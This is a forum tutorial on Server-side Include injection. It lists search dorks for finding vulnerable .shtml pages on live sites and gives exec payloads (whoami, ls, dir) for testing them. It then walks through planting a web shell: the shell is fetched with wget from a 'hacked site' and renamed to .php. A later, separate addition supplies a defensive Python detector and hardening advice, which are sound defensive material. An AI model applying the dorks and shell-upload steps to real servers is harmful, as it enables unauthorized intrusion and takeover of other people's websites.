SSI Injection 11-09-2012, 09:18 AM
#1
In this tutorial, I will write about SSI Injection, hope you like it. =)
Code:
SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before they are inserted into a server-side interpreted HTML file.
-Wikipedia
Server-side Include Injection gives us the power to execute OS commands or include a restricted file's contents the next time the page is served.
First, you need to find a vulnerable site. =D
Here are some dorks:
Code:
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Hope those are enough!
Time to test sites for vulnerability.
To find out if the site is vulnerable, you should enter an OS command.
Here are some example commands.
Code:
<!--#echo var="DATE_LOCAL" -->
Will display the Date.
<!--#exec cmd="whoami"-->
Will show which user is running on the server.
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
Will display all files in the directory (Linux).
<!-- #exec cmd="dir" -->
Will display all files in the directory (Windows).
<!--#echo var="DOCUMENT_URI" -->
Will display the document uri.
Write one of those commands in a text box, login/registration fields etc...
![[Image: ssiy.jpg]](http://img838.imageshack.us/img838/6051/ssiy.jpg)
So, when you have found and tested a site for vulnerability, it's time to exploit it.
We are going to upload a shell; you can download shells from my thread.
Ok, now you need a .txt extension on your shell and you should upload it somewhere (hacked site, hosting...).
And, you should download it to the site which is vulnerable to SSI Injection. This is the command you should use.
Code:
<!--#exec cmd="wget URL to shell" -->
So, if the text file is downloaded, execute this command.
Code:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
This command will show every file in the directory.
Now it's time to change the extension to .php .
Code:
<!--#exec cmd="mv shell1.txt shell.php" -->
Now run the list command again.
Code:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
And, your shell should be .php; run it, and if everything is OK, you have successfully exploited the site.
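The Wikipedia quote above puts the root cause in user-supplied data that is not sanitized before it lands in a server-parsed page. The following is an added example, not part of the original post: a defender-side check that flags SSI directives in request parameters and HTML-encodes input before it is written into an .shtml file. The function names and the sample requests are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Opener of an SSI directive, e.g. <!--#exec or <!--#echo. Whitespace variants
# such as "<!-- #exec" are flagged too: they show probing even where the
# server would treat them as a plain comment (assumption of this example).
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*([a-z]+)\b", re.IGNORECASE)
HIGH_RISK = {"exec", "include"}  # command execution / file inclusion


def find_ssi_directives(value):
    """Return the lower-cased directive names found in one input value."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(value)]


def neutralize(value):
    """HTML-encode input so "<!--#" never reaches the SSI parser intact."""
    return html.escape(value, quote=True)


def scan_request(url):
    """Return (parameter, directive, severity) findings for a request URL."""
    findings = []
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        for directive in find_ssi_directives(value):
            severity = "high" if directive in HIGH_RISK else "medium"
            findings.append((name, directive, severity))
    return findings


# Constructed sample requests (URL-encoded, as they would appear in a log).
SAMPLE_REQUESTS = [
    "/search.shtml?q=shoes",
    "/search.shtml?q=%3C!--%23echo+var%3D%22DATE_LOCAL%22+--%3E",
    "/register.shtml?user=%3C!--%23exec+cmd%3D%22whoami%22--%3E&mail=a%40b.c",
    "/login.shtml?page=%3C!--+%23exec+cmd%3D%22dir%22+--%3E",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request, "->", scan_request(request) or "clean")
    print(neutralize('<!--#exec cmd="whoami"-->'))
```

On Apache, `Options IncludesNOEXEC` additionally disables the exec directive, so an injected `#exec cmd` is not run even if encoding is missed somewhere.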